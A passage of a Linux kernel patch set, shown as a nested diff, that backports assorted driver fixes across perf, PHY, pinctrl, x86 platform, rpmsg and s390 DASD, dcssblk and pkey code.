+--- a/drivers/perf/fsl_imx8_ddr_perf.c
++++ b/drivers/perf/fsl_imx8_ddr_perf.c
+@@ -102,6 +102,7 @@ struct ddr_pmu {
+ 	const struct fsl_ddr_devtype_data *devtype_data;
+ 	int irq;
+ 	int id;
++	int active_counter;
+ };
+ 
+ static ssize_t ddr_perf_identifier_show(struct device *dev,
+@@ -496,6 +497,10 @@ static void ddr_perf_event_start(struct perf_event *event, int flags)
+ 
+ 	ddr_perf_counter_enable(pmu, event->attr.config, counter, true);
+ 
++	if (!pmu->active_counter++)
++		ddr_perf_counter_enable(pmu, EVENT_CYCLES_ID,
++			EVENT_CYCLES_COUNTER, true);
++
+ 	hwc->state = 0;
+ }
+ 
+@@ -550,6 +555,10 @@ static void ddr_perf_event_stop(struct perf_event *event, int flags)
+ 	ddr_perf_counter_enable(pmu, event->attr.config, counter, false);
+ 	ddr_perf_event_update(event);
+ 
++	if (!--pmu->active_counter)
++		ddr_perf_counter_enable(pmu, EVENT_CYCLES_ID,
++			EVENT_CYCLES_COUNTER, false);
++
+ 	hwc->state |= PERF_HES_STOPPED;
+ }
+ 
+@@ -568,25 +577,10 @@ static void ddr_perf_event_del(struct perf_event *event, int flags)
+ 
+ static void ddr_perf_pmu_enable(struct pmu *pmu)
+ {
+-	struct ddr_pmu *ddr_pmu = to_ddr_pmu(pmu);
+-
+-	/* enable cycle counter if cycle is not active event list */
+-	if (ddr_pmu->events[EVENT_CYCLES_COUNTER] == NULL)
+-		ddr_perf_counter_enable(ddr_pmu,
+-				      EVENT_CYCLES_ID,
+-				      EVENT_CYCLES_COUNTER,
+-				      true);
+ }
+ 
+ static void ddr_perf_pmu_disable(struct pmu *pmu)
+ {
+-	struct ddr_pmu *ddr_pmu = to_ddr_pmu(pmu);
+-
+-	if (ddr_pmu->events[EVENT_CYCLES_COUNTER] == NULL)
+-		ddr_perf_counter_enable(ddr_pmu,
+-				      EVENT_CYCLES_ID,
+-				      EVENT_CYCLES_COUNTER,
+-				      false);
+ }
+ 
+ static int ddr_perf_init(struct ddr_pmu *pmu, void __iomem *base,
+diff --git a/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c b/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
+index 6170f8fd118e2..d0319bee01c0f 100644
+--- a/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
++++ b/drivers/phy/qualcomm/phy-qcom-snps-femto-v2.c
+@@ -214,8 +214,7 @@ static int __maybe_unused qcom_snps_hsphy_runtime_suspend(struct device *dev)
+ 	if (!hsphy->phy_initialized)
+ 		return 0;
+ 
+-	qcom_snps_hsphy_suspend(hsphy);
+-	return 0;
++	return qcom_snps_hsphy_suspend(hsphy);
+ }
+ 
+ static int __maybe_unused qcom_snps_hsphy_runtime_resume(struct device *dev)
+@@ -225,8 +224,7 @@ static int __maybe_unused qcom_snps_hsphy_runtime_resume(struct device *dev)
+ 	if (!hsphy->phy_initialized)
+ 		return 0;
+ 
+-	qcom_snps_hsphy_resume(hsphy);
+-	return 0;
++	return qcom_snps_hsphy_resume(hsphy);
+ }
+ 
+ static int qcom_snps_hsphy_set_mode(struct phy *phy, enum phy_mode mode,
+diff --git a/drivers/phy/rockchip/phy-rockchip-inno-hdmi.c b/drivers/phy/rockchip/phy-rockchip-inno-hdmi.c
+index 80acca4e9e146..2556caf475c0c 100644
+--- a/drivers/phy/rockchip/phy-rockchip-inno-hdmi.c
++++ b/drivers/phy/rockchip/phy-rockchip-inno-hdmi.c
+@@ -745,10 +745,12 @@ unsigned long inno_hdmi_phy_rk3328_clk_recalc_rate(struct clk_hw *hw,
+ 		do_div(vco, (nd * (no_a == 1 ? no_b : no_a) * no_d * 2));
+ 	}
+ 
+-	inno->pixclock = vco;
+-	dev_dbg(inno->dev, "%s rate %lu\n", __func__, inno->pixclock);
++	inno->pixclock = DIV_ROUND_CLOSEST((unsigned long)vco, 1000) * 1000;
+ 
+-	return vco;
++	dev_dbg(inno->dev, "%s rate %lu vco %llu\n",
++		__func__, inno->pixclock, vco);
++
++	return inno->pixclock;
+ }
+ 
+ static long inno_hdmi_phy_rk3328_clk_round_rate(struct clk_hw *hw,
+@@ -790,8 +792,8 @@ static int inno_hdmi_phy_rk3328_clk_set_rate(struct clk_hw *hw,
+ 			 RK3328_PRE_PLL_POWER_DOWN);
+ 
+ 	/* Configure pre-pll */
+-	inno_update_bits(inno, 0xa0, RK3228_PCLK_VCO_DIV_5_MASK,
+-			 RK3228_PCLK_VCO_DIV_5(cfg->vco_div_5_en));
++	inno_update_bits(inno, 0xa0, RK3328_PCLK_VCO_DIV_5_MASK,
++			 RK3328_PCLK_VCO_DIV_5(cfg->vco_div_5_en));
+ 	inno_write(inno, 0xa1, RK3328_PRE_PLL_PRE_DIV(cfg->prediv));
+ 
+ 	val = RK3328_SPREAD_SPECTRUM_MOD_DISABLE;
+@@ -1021,9 +1023,10 @@ inno_hdmi_phy_rk3328_power_on(struct inno_hdmi_phy *inno,
+ 
+ 	inno_write(inno, 0xac, RK3328_POST_PLL_FB_DIV_7_0(cfg->fbdiv));
+ 	if (cfg->postdiv == 1) {
+-		inno_write(inno, 0xaa, RK3328_POST_PLL_REFCLK_SEL_TMDS);
+ 		inno_write(inno, 0xab, RK3328_POST_PLL_FB_DIV_8(cfg->fbdiv) |
+ 			   RK3328_POST_PLL_PRE_DIV(cfg->prediv));
++		inno_write(inno, 0xaa, RK3328_POST_PLL_REFCLK_SEL_TMDS |
++			   RK3328_POST_PLL_POWER_DOWN);
+ 	} else {
+ 		v = (cfg->postdiv / 2) - 1;
+ 		v &= RK3328_POST_PLL_POST_DIV_MASK;
+@@ -1031,7 +1034,8 @@ inno_hdmi_phy_rk3328_power_on(struct inno_hdmi_phy *inno,
+ 		inno_write(inno, 0xab, RK3328_POST_PLL_FB_DIV_8(cfg->fbdiv) |
+ 			   RK3328_POST_PLL_PRE_DIV(cfg->prediv));
+ 		inno_write(inno, 0xaa, RK3328_POST_PLL_POST_DIV_ENABLE |
+-			   RK3328_POST_PLL_REFCLK_SEL_TMDS);
++			   RK3328_POST_PLL_REFCLK_SEL_TMDS |
++			   RK3328_POST_PLL_POWER_DOWN);
+ 	}
+ 
+ 	for (v = 0; v < 14; v++)
+diff --git a/drivers/pinctrl/pinctrl-mcp23s08_spi.c b/drivers/pinctrl/pinctrl-mcp23s08_spi.c
+index 9ae10318f6f35..ea059b9c5542e 100644
+--- a/drivers/pinctrl/pinctrl-mcp23s08_spi.c
++++ b/drivers/pinctrl/pinctrl-mcp23s08_spi.c
+@@ -91,18 +91,28 @@ static int mcp23s08_spi_regmap_init(struct mcp23s08 *mcp, struct device *dev,
+ 		mcp->reg_shift = 0;
+ 		mcp->chip.ngpio = 8;
+ 		mcp->chip.label = devm_kasprintf(dev, GFP_KERNEL, "mcp23s08.%d", addr);
++		if (!mcp->chip.label)
++			return -ENOMEM;
+ 
+ 		config = &mcp23x08_regmap;
+ 		name = devm_kasprintf(dev, GFP_KERNEL, "%d", addr);
++		if (!name)
++			return -ENOMEM;
++
+ 		break;
+ 
+ 	case MCP_TYPE_S17:
+ 		mcp->reg_shift = 1;
+ 		mcp->chip.ngpio = 16;
+ 		mcp->chip.label = devm_kasprintf(dev, GFP_KERNEL, "mcp23s17.%d", addr);
++		if (!mcp->chip.label)
++			return -ENOMEM;
+ 
+ 		config = &mcp23x17_regmap;
+ 		name = devm_kasprintf(dev, GFP_KERNEL, "%d", addr);
++		if (!name)
++			return -ENOMEM;
++
+ 		break;
+ 
+ 	case MCP_TYPE_S18:
+diff --git a/drivers/platform/chrome/chromeos_acpi.c b/drivers/platform/chrome/chromeos_acpi.c
+index 50d8a4d4352d6..1312aaaa8750b 100644
+--- a/drivers/platform/chrome/chromeos_acpi.c
++++ b/drivers/platform/chrome/chromeos_acpi.c
+@@ -90,7 +90,36 @@ static int chromeos_acpi_handle_package(struct device *dev, union acpi_object *o
+ 	case ACPI_TYPE_STRING:
+ 		return sysfs_emit(buf, "%s\n", element->string.pointer);
+ 	case ACPI_TYPE_BUFFER:
+-		return sysfs_emit(buf, "%s\n", element->buffer.pointer);
++		{
++			int i, r, at, room_left;
++			const int byte_per_line = 16;
++
++			at = 0;
++			room_left = PAGE_SIZE - 1;
++			for (i = 0; i < element->buffer.length && room_left; i += byte_per_line) {
++				r = hex_dump_to_buffer(element->buffer.pointer + i,
++						       element->buffer.length - i,
++						       byte_per_line, 1, buf + at, room_left,
++						       false);
++				if (r > room_left)
++					goto truncating;
++				at += r;
++				room_left -= r;
++
++				r = sysfs_emit_at(buf, at, "\n");
++				if (!r)
++					goto truncating;
++				at += r;
++				room_left -= r;
++			}
++
++			buf[at] = 0;
++			return at;
++truncating:
++			dev_info_once(dev, "truncating sysfs content for %s\n", name);
++			sysfs_emit_at(buf, PAGE_SIZE - 4, "..\n");
++			return PAGE_SIZE - 1;
++		}
+ 	default:
+ 		dev_err(dev, "element type %d not supported\n", element->type);
+ 		return -EINVAL;
+diff --git a/drivers/platform/mellanox/mlxbf-tmfifo.c b/drivers/platform/mellanox/mlxbf-tmfifo.c
+index b2e19f30a928b..d31fe7eed38df 100644
+--- a/drivers/platform/mellanox/mlxbf-tmfifo.c
++++ b/drivers/platform/mellanox/mlxbf-tmfifo.c
+@@ -868,6 +868,7 @@ static bool mlxbf_tmfifo_virtio_notify(struct virtqueue *vq)
+ 			tm_vdev = fifo->vdev[VIRTIO_ID_CONSOLE];
+ 			mlxbf_tmfifo_console_output(tm_vdev, vring);
+ 			spin_unlock_irqrestore(&fifo->spin_lock[0], flags);
++			set_bit(MLXBF_TM_TX_LWM_IRQ, &fifo->pend_events);
+ 		} else if (test_and_set_bit(MLXBF_TM_TX_LWM_IRQ,
+ 					    &fifo->pend_events)) {
+ 			return true;
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index 8a38cd94a605d..d10c097380c56 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -322,7 +322,8 @@ static void amd_pmf_init_features(struct amd_pmf_dev *dev)
+ 
+ static void amd_pmf_deinit_features(struct amd_pmf_dev *dev)
+ {
+-	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
++	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR) ||
++	    is_apmf_func_supported(dev, APMF_FUNC_OS_POWER_SLIDER_UPDATE)) {
+ 		power_supply_unreg_notifier(&dev->pwr_src_notifier);
+ 		amd_pmf_deinit_sps(dev);
+ 	}
+diff --git a/drivers/platform/x86/amd/pmf/sps.c b/drivers/platform/x86/amd/pmf/sps.c
+index fd448844de206..b2cf62937227c 100644
+--- a/drivers/platform/x86/amd/pmf/sps.c
++++ b/drivers/platform/x86/amd/pmf/sps.c
+@@ -121,7 +121,8 @@ int amd_pmf_get_pprof_modes(struct amd_pmf_dev *pmf)
+ 
+ int amd_pmf_power_slider_update_event(struct amd_pmf_dev *dev)
+ {
+-	u8 mode, flag = 0;
++	u8 flag = 0;
++	int mode;
+ 	int src;
+ 
+ 	mode = amd_pmf_get_pprof_modes(dev);
+diff --git a/drivers/platform/x86/asus-wmi.c b/drivers/platform/x86/asus-wmi.c
+index 02bf286924183..36effe04c6f33 100644
+--- a/drivers/platform/x86/asus-wmi.c
++++ b/drivers/platform/x86/asus-wmi.c
+@@ -738,13 +738,23 @@ static ssize_t kbd_rgb_mode_store(struct device *dev,
+ 				 struct device_attribute *attr,
+ 				 const char *buf, size_t count)
+ {
+-	u32 cmd, mode, r, g,  b,  speed;
++	u32 cmd, mode, r, g, b, speed;
+ 	int err;
+ 
+ 	if (sscanf(buf, "%d %d %d %d %d %d", &cmd, &mode, &r, &g, &b, &speed) != 6)
+ 		return -EINVAL;
+ 
+-	cmd = !!cmd;
++	/* B3 is set and B4 is save to BIOS */
++	switch (cmd) {
++	case 0:
++		cmd = 0xb3;
++		break;
++	case 1:
++		cmd = 0xb4;
++		break;
++	default:
++		return -EINVAL;
++	}
+ 
+ 	/* These are the known usable modes across all TUF/ROG */
+ 	if (mode >= 12 || mode == 9)
+diff --git a/drivers/platform/x86/dell/dell-wmi-sysman/sysman.c b/drivers/platform/x86/dell/dell-wmi-sysman/sysman.c
+index 0a6411a8a104c..b2406a595be9a 100644
+--- a/drivers/platform/x86/dell/dell-wmi-sysman/sysman.c
++++ b/drivers/platform/x86/dell/dell-wmi-sysman/sysman.c
+@@ -396,6 +396,7 @@ static int init_bios_attributes(int attr_type, const char *guid)
+ 	struct kobject *attr_name_kobj; //individual attribute names
+ 	union acpi_object *obj = NULL;
+ 	union acpi_object *elements;
++	struct kobject *duplicate;
+ 	struct kset *tmp_set;
+ 	int min_elements;
+ 
+@@ -454,9 +455,11 @@ static int init_bios_attributes(int attr_type, const char *guid)
+ 		else
+ 			tmp_set = wmi_priv.main_dir_kset;
+ 
+-		if (kset_find_obj(tmp_set, elements[ATTR_NAME].string.pointer)) {
+-			pr_debug("duplicate attribute name found - %s\n",
+-				elements[ATTR_NAME].string.pointer);
++		duplicate = kset_find_obj(tmp_set, elements[ATTR_NAME].string.pointer);
++		if (duplicate) {
++			pr_debug("Duplicate attribute name found - %s\n",
++				 elements[ATTR_NAME].string.pointer);
++			kobject_put(duplicate);
+ 			goto nextobj;
+ 		}
+ 
+diff --git a/drivers/platform/x86/huawei-wmi.c b/drivers/platform/x86/huawei-wmi.c
+index b85050e4a0d65..ae5daecff1771 100644
+--- a/drivers/platform/x86/huawei-wmi.c
++++ b/drivers/platform/x86/huawei-wmi.c
+@@ -86,6 +86,8 @@ static const struct key_entry huawei_wmi_keymap[] = {
+ 	{ KE_IGNORE, 0x293, { KEY_KBDILLUMTOGGLE } },
+ 	{ KE_IGNORE, 0x294, { KEY_KBDILLUMUP } },
+ 	{ KE_IGNORE, 0x295, { KEY_KBDILLUMUP } },
++	// Ignore Ambient Light Sensoring
++	{ KE_KEY,    0x2c1, { KEY_RESERVED } },
+ 	{ KE_END,	 0 }
+ };
+ 
+diff --git a/drivers/platform/x86/intel/hid.c b/drivers/platform/x86/intel/hid.c
+index b6313ecd190c0..b96ef0eb82aff 100644
+--- a/drivers/platform/x86/intel/hid.c
++++ b/drivers/platform/x86/intel/hid.c
+@@ -131,6 +131,12 @@ static const struct dmi_system_id dmi_vgbs_allow_list[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "Surface Go"),
+ 		},
+ 	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "HP Elite Dragonfly G2 Notebook PC"),
++		},
++	},
+ 	{ }
+ };
+ 
+@@ -601,7 +607,7 @@ static bool button_array_present(struct platform_device *device)
+ static int intel_hid_probe(struct platform_device *device)
+ {
+ 	acpi_handle handle = ACPI_HANDLE(&device->dev);
+-	unsigned long long mode;
++	unsigned long long mode, dummy;
+ 	struct intel_hid_priv *priv;
+ 	acpi_status status;
+ 	int err;
+@@ -666,18 +672,15 @@ static int intel_hid_probe(struct platform_device *device)
+ 	if (err)
+ 		goto err_remove_notify;
+ 
+-	if (priv->array) {
+-		unsigned long long dummy;
++	intel_button_array_enable(&device->dev, true);
+ 
+-		intel_button_array_enable(&device->dev, true);
+-
+-		/* Call button load method to enable HID power button */
+-		if (!intel_hid_evaluate_method(handle, INTEL_HID_DSM_BTNL_FN,
+-					       &dummy)) {
+-			dev_warn(&device->dev,
+-				 "failed to enable HID power button\n");
+-		}
+-	}
++	/*
++	 * Call button load method to enable HID power button
++	 * Always do this since it activates events on some devices without
++	 * a button array too.
++	 */
++	if (!intel_hid_evaluate_method(handle, INTEL_HID_DSM_BTNL_FN, &dummy))
++		dev_warn(&device->dev, "failed to enable HID power button\n");
+ 
+ 	device_init_wakeup(&device->dev, true);
+ 	/*
+diff --git a/drivers/platform/x86/think-lmi.c b/drivers/platform/x86/think-lmi.c
+index 3cbb92b6c5215..f6290221d139d 100644
+--- a/drivers/platform/x86/think-lmi.c
++++ b/drivers/platform/x86/think-lmi.c
+@@ -719,12 +719,12 @@ static ssize_t cert_to_password_store(struct kobject *kobj,
+ 	/* Format: 'Password,Signature' */
+ 	auth_str = kasprintf(GFP_KERNEL, "%s,%s", passwd, setting->signature);
+ 	if (!auth_str) {
+-		kfree(passwd);
++		kfree_sensitive(passwd);
+ 		return -ENOMEM;
+ 	}
+ 	ret = tlmi_simple_call(LENOVO_CERT_TO_PASSWORD_GUID, auth_str);
+ 	kfree(auth_str);
+-	kfree(passwd);
++	kfree_sensitive(passwd);
+ 
+ 	return ret ?: count;
+ }
+diff --git a/drivers/rpmsg/qcom_glink_native.c b/drivers/rpmsg/qcom_glink_native.c
+index 67e7664efb0dc..cb8f65c1d4e3b 100644
+--- a/drivers/rpmsg/qcom_glink_native.c
++++ b/drivers/rpmsg/qcom_glink_native.c
+@@ -224,6 +224,10 @@ static struct glink_channel *qcom_glink_alloc_channel(struct qcom_glink *glink,
+ 
+ 	channel->glink = glink;
+ 	channel->name = kstrdup(name, GFP_KERNEL);
++	if (!channel->name) {
++		kfree(channel);
++		return ERR_PTR(-ENOMEM);
++	}
+ 
+ 	init_completion(&channel->open_req);
+ 	init_completion(&channel->open_ack);
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index bce3422d85640..04d9b1d4b1ba9 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
+@@ -2926,41 +2926,32 @@ static void _dasd_wake_block_flush_cb(struct dasd_ccw_req *cqr, void *data)
+  * Requeue a request back to the block request queue
+  * only works for block requests
+  */
+-static int _dasd_requeue_request(struct dasd_ccw_req *cqr)
++static void _dasd_requeue_request(struct dasd_ccw_req *cqr)
+ {
+-	struct dasd_block *block = cqr->block;
+ 	struct request *req;
+ 
+-	if (!block)
+-		return -EINVAL;
+ 	/*
+ 	 * If the request is an ERP request there is nothing to requeue.
+ 	 * This will be done with the remaining original request.
+ 	 */
+ 	if (cqr->refers)
+-		return 0;
++		return;
+ 	spin_lock_irq(&cqr->dq->lock);
+ 	req = (struct request *) cqr->callback_data;
+ 	blk_mq_requeue_request(req, true);
+ 	spin_unlock_irq(&cqr->dq->lock);
+ 
+-	return 0;
++	return;
+ }
+ 
+-/*
+- * Go through all request on the dasd_block request queue, cancel them
+- * on the respective dasd_device, and return them to the generic
+- * block layer.
+- */
+-static int dasd_flush_block_queue(struct dasd_block *block)
++static int _dasd_requests_to_flushqueue(struct dasd_block *block,
++					struct list_head *flush_queue)
+ {
+ 	struct dasd_ccw_req *cqr, *n;
+-	int rc, i;
+-	struct list_head flush_queue;
+ 	unsigned long flags;
++	int rc, i;
+ 
+-	INIT_LIST_HEAD(&flush_queue);
+-	spin_lock_bh(&block->queue_lock);
++	spin_lock_irqsave(&block->queue_lock, flags);
+ 	rc = 0;
+ restart:
+ 	list_for_each_entry_safe(cqr, n, &block->ccw_queue, blocklist) {
+@@ -2975,13 +2966,32 @@ restart:
+ 		 * is returned from the dasd_device layer.
+ 		 */
+ 		cqr->callback = _dasd_wake_block_flush_cb;
+-		for (i = 0; cqr != NULL; cqr = cqr->refers, i++)
+-			list_move_tail(&cqr->blocklist, &flush_queue);
++		for (i = 0; cqr; cqr = cqr->refers, i++)
++			list_move_tail(&cqr->blocklist, flush_queue);
+ 		if (i > 1)
+ 			/* moved more than one request - need to restart */
+ 			goto restart;
+ 	}
+-	spin_unlock_bh(&block->queue_lock);
++	spin_unlock_irqrestore(&block->queue_lock, flags);
++
++	return rc;
++}
++
++/*
++ * Go through all request on the dasd_block request queue, cancel them
++ * on the respective dasd_device, and return them to the generic
++ * block layer.
++ */
++static int dasd_flush_block_queue(struct dasd_block *block)
++{
++	struct dasd_ccw_req *cqr, *n;
++	struct list_head flush_queue;
++	unsigned long flags;
++	int rc;
++
++	INIT_LIST_HEAD(&flush_queue);
++	rc = _dasd_requests_to_flushqueue(block, &flush_queue);
++
+ 	/* Now call the callback function of flushed requests */
+ restart_cb:
+ 	list_for_each_entry_safe(cqr, n, &flush_queue, blocklist) {
+@@ -3864,75 +3874,36 @@ EXPORT_SYMBOL_GPL(dasd_generic_space_avail);
+  */
+ int dasd_generic_requeue_all_requests(struct dasd_device *device)
+ {
++	struct dasd_block *block = device->block;
+ 	struct list_head requeue_queue;
+ 	struct dasd_ccw_req *cqr, *n;
+-	struct dasd_ccw_req *refers;
+ 	int rc;
+ 
+-	INIT_LIST_HEAD(&requeue_queue);
+-	spin_lock_irq(get_ccwdev_lock(device->cdev));
+-	rc = 0;
+-	list_for_each_entry_safe(cqr, n, &device->ccw_queue, devlist) {
+-		/* Check status and move request to flush_queue */
+-		if (cqr->status == DASD_CQR_IN_IO) {
+-			rc = device->discipline->term_IO(cqr);
+-			if (rc) {
+-				/* unable to terminate requeust */
+-				dev_err(&device->cdev->dev,
+-					"Unable to terminate request %p "
+-					"on suspend\n", cqr);
+-				spin_unlock_irq(get_ccwdev_lock(device->cdev));
+-				dasd_put_device(device);
+-				return rc;
+-			}
+-		}
+-		list_move_tail(&cqr->devlist, &requeue_queue);
+-	}
+-	spin_unlock_irq(get_ccwdev_lock(device->cdev));
+-
+-	list_for_each_entry_safe(cqr, n, &requeue_queue, devlist) {
+-		wait_event(dasd_flush_wq,
+-			   (cqr->status != DASD_CQR_CLEAR_PENDING));
++	if (!block)
++		return 0;
+ 
+-		/*
+-		 * requeue requests to blocklayer will only work
+-		 * for block device requests
+-		 */
+-		if (_dasd_requeue_request(cqr))
+-			continue;
++	INIT_LIST_HEAD(&requeue_queue);
++	rc = _dasd_requests_to_flushqueue(block, &requeue_queue);
+ 
+-		/* remove requests from device and block queue */
+-		list_del_init(&cqr->devlist);
+-		while (cqr->refers != NULL) {
+-			refers = cqr->refers;
+-			/* remove the request from the block queue */
+-			list_del(&cqr->blocklist);
+-			/* free the finished erp request */
+-			dasd_free_erp_request(cqr, cqr->memdev);
+-			cqr = refers;
++	/* Now call the callback function of flushed requests */
++restart_cb:
++	list_for_each_entry_safe(cqr, n, &requeue_queue, blocklist) {
++		wait_event(dasd_flush_wq, (cqr->status < DASD_CQR_QUEUED));
++		/* Process finished ERP request. */
++		if (cqr->refers) {
++			spin_lock_bh(&block->queue_lock);
++			__dasd_process_erp(block->base, cqr);
++			spin_unlock_bh(&block->queue_lock);
++			/* restart list_for_xx loop since dasd_process_erp
++			 * might remove multiple elements
++			 */
++			goto restart_cb;
+ 		}
+-
+-		/*
+-		 * _dasd_requeue_request already checked for a valid
+-		 * blockdevice, no need to check again
+-		 * all erp requests (cqr->refers) have a cqr->block
+-		 * pointer copy from the original cqr
+-		 */
++		_dasd_requeue_request(cqr);
+ 		list_del_init(&cqr->blocklist);
+ 		cqr->block->base->discipline->free_cp(
+ 			cqr, (struct request *) cqr->callback_data);
+ 	}
+-
+-	/*
+-	 * if requests remain then they are internal request
+-	 * and go back to the device queue
+-	 */
+-	if (!list_empty(&requeue_queue)) {
+-		/* move freeze_queue to start of the ccw_queue */
+-		spin_lock_irq(get_ccwdev_lock(device->cdev));
+-		list_splice_tail(&requeue_queue, &device->ccw_queue);
+-		spin_unlock_irq(get_ccwdev_lock(device->cdev));
+-	}
+ 	dasd_schedule_device_bh(device);
+ 	return rc;
+ }
+diff --git a/drivers/s390/block/dasd_3990_erp.c b/drivers/s390/block/dasd_3990_erp.c
+index d030fe2e29643..91cb9d52a4250 100644
+--- a/drivers/s390/block/dasd_3990_erp.c
++++ b/drivers/s390/block/dasd_3990_erp.c
+@@ -2441,7 +2441,7 @@ static struct dasd_ccw_req *dasd_3990_erp_add_erp(struct dasd_ccw_req *cqr)
+ 	erp->block    = cqr->block;
+ 	erp->magic    = cqr->magic;
+ 	erp->expires  = cqr->expires;
+-	erp->retries  = 256;
++	erp->retries  = device->default_retries;
+ 	erp->buildclk = get_tod_clock();
+ 	erp->status = DASD_CQR_FILLED;
+ 
+diff --git a/drivers/s390/block/dasd_devmap.c b/drivers/s390/block/dasd_devmap.c
+index df17f0f9cb0fc..b2a4c34330573 100644
+--- a/drivers/s390/block/dasd_devmap.c
++++ b/drivers/s390/block/dasd_devmap.c
+@@ -1377,16 +1377,12 @@ static ssize_t dasd_vendor_show(struct device *dev,
+ 
+ static DEVICE_ATTR(vendor, 0444, dasd_vendor_show, NULL);
+ 
+-#define UID_STRLEN ( /* vendor */ 3 + 1 + /* serial    */ 14 + 1 +\
+-		     /* SSID   */ 4 + 1 + /* unit addr */ 2 + 1 +\
+-		     /* vduit */ 32 + 1)
+-
+ static ssize_t
+ dasd_uid_show(struct device *dev, struct device_attribute *attr, char *buf)
+ {
++	char uid_string[DASD_UID_STRLEN];
+ 	struct dasd_device *device;
+ 	struct dasd_uid uid;
+-	char uid_string[UID_STRLEN];
+ 	char ua_string[3];
+ 
+ 	device = dasd_device_from_cdev(to_ccwdev(dev));
+diff --git a/drivers/s390/block/dasd_eckd.c b/drivers/s390/block/dasd_eckd.c
+index 792e5d245bc38..c5619751a0658 100644
+--- a/drivers/s390/block/dasd_eckd.c
++++ b/drivers/s390/block/dasd_eckd.c
+@@ -1079,12 +1079,12 @@ static void dasd_eckd_get_uid_string(struct dasd_conf *conf,
+ 
+ 	create_uid(conf, &uid);
+ 	if (strlen(uid.vduit) > 0)
+-		snprintf(print_uid, sizeof(*print_uid),
++		snprintf(print_uid, DASD_UID_STRLEN,
+ 			 "%s.%s.%04x.%02x.%s",
+ 			 uid.vendor, uid.serial, uid.ssid,
+ 			 uid.real_unit_addr, uid.vduit);
+ 	else
+-		snprintf(print_uid, sizeof(*print_uid),
++		snprintf(print_uid, DASD_UID_STRLEN,
+ 			 "%s.%s.%04x.%02x",
+ 			 uid.vendor, uid.serial, uid.ssid,
+ 			 uid.real_unit_addr);
+@@ -1093,8 +1093,8 @@ static void dasd_eckd_get_uid_string(struct dasd_conf *conf,
+ static int dasd_eckd_check_cabling(struct dasd_device *device,
+ 				   void *conf_data, __u8 lpm)
+ {
++	char print_path_uid[DASD_UID_STRLEN], print_device_uid[DASD_UID_STRLEN];
+ 	struct dasd_eckd_private *private = device->private;
+-	char print_path_uid[60], print_device_uid[60];
+ 	struct dasd_conf path_conf;
+ 
+ 	path_conf.data = conf_data;
+@@ -1293,9 +1293,9 @@ static void dasd_eckd_path_available_action(struct dasd_device *device,
+ 	__u8 path_rcd_buf[DASD_ECKD_RCD_DATA_SIZE];
+ 	__u8 lpm, opm, npm, ppm, epm, hpfpm, cablepm;
+ 	struct dasd_conf_data *conf_data;
++	char print_uid[DASD_UID_STRLEN];
+ 	struct dasd_conf path_conf;
+ 	unsigned long flags;
+-	char print_uid[60];
+ 	int rc, pos;
+ 
+ 	opm = 0;
+@@ -5856,8 +5856,8 @@ static void dasd_eckd_dump_sense(struct dasd_device *device,
+ static int dasd_eckd_reload_device(struct dasd_device *device)
+ {
+ 	struct dasd_eckd_private *private = device->private;
++	char print_uid[DASD_UID_STRLEN];
+ 	int rc, old_base;
+-	char print_uid[60];
+ 	struct dasd_uid uid;
+ 	unsigned long flags;
+ 
+diff --git a/drivers/s390/block/dasd_int.h b/drivers/s390/block/dasd_int.h
+index 97adc8a7ae6b1..f50932518f83a 100644
+--- a/drivers/s390/block/dasd_int.h
++++ b/drivers/s390/block/dasd_int.h
+@@ -259,6 +259,10 @@ struct dasd_uid {
+ 	char vduit[33];
+ };
+ 
++#define DASD_UID_STRLEN ( /* vendor */ 3 + 1 + /* serial    */ 14 + 1 +	\
++			  /* SSID   */ 4 + 1 + /* unit addr */ 2 + 1 +	\
++			  /* vduit */ 32 + 1)
++
+ /*
+  * PPRC Status data
+  */
+diff --git a/drivers/s390/block/dcssblk.c b/drivers/s390/block/dcssblk.c
+index c0f85ffb2b62d..735ee0ca4a13b 100644
+--- a/drivers/s390/block/dcssblk.c
++++ b/drivers/s390/block/dcssblk.c
+@@ -411,6 +411,7 @@ removeseg:
+ 	}
+ 	list_del(&dev_info->lh);
+ 
++	dax_remove_host(dev_info->gd);
+ 	kill_dax(dev_info->dax_dev);
+ 	put_dax(dev_info->dax_dev);
+ 	del_gendisk(dev_info->gd);
+@@ -706,9 +707,9 @@ dcssblk_add_store(struct device *dev, struct device_attribute *attr, const char
+ 	goto out;
+ 
+ out_dax_host:
++	put_device(&dev_info->dev);
+ 	dax_remove_host(dev_info->gd);
+ out_dax:
+-	put_device(&dev_info->dev);
+ 	kill_dax(dev_info->dax_dev);
+ 	put_dax(dev_info->dax_dev);
+ put_dev:
+@@ -788,6 +789,7 @@ dcssblk_remove_store(struct device *dev, struct device_attribute *attr, const ch
+ 	}
+ 
+ 	list_del(&dev_info->lh);
++	dax_remove_host(dev_info->gd);
+ 	kill_dax(dev_info->dax_dev);
+ 	put_dax(dev_info->dax_dev);
+ 	del_gendisk(dev_info->gd);
+diff --git a/drivers/s390/crypto/pkey_api.c b/drivers/s390/crypto/pkey_api.c
+index a8def50c149bd..2b92ec20ed68e 100644
+--- a/drivers/s390/crypto/pkey_api.c
++++ b/drivers/s390/crypto/pkey_api.c
+@@ -565,6 +565,11 @@ static int pkey_genseckey2(const struct pkey_apqn *apqns, size_t nr_apqns,
+ 		if (*keybufsize < MINEP11AESKEYBLOBSIZE)
+ 			return -EINVAL;
+ 		break;
++	case PKEY_TYPE_EP11_AES:
++		if (*keybufsize < (sizeof(struct ep11kblob_header) +
++				   MINEP11AESKEYBLOBSIZE))
++			return -EINVAL;
++		break;
+ 	default:
+ 		return -EINVAL;
+ 	}
+@@ -581,9 +586,10 @@ static int pkey_genseckey2(const struct pkey_apqn *apqns, size_t nr_apqns,
+ 	for (i = 0, rc = -ENODEV; i < nr_apqns; i++) {
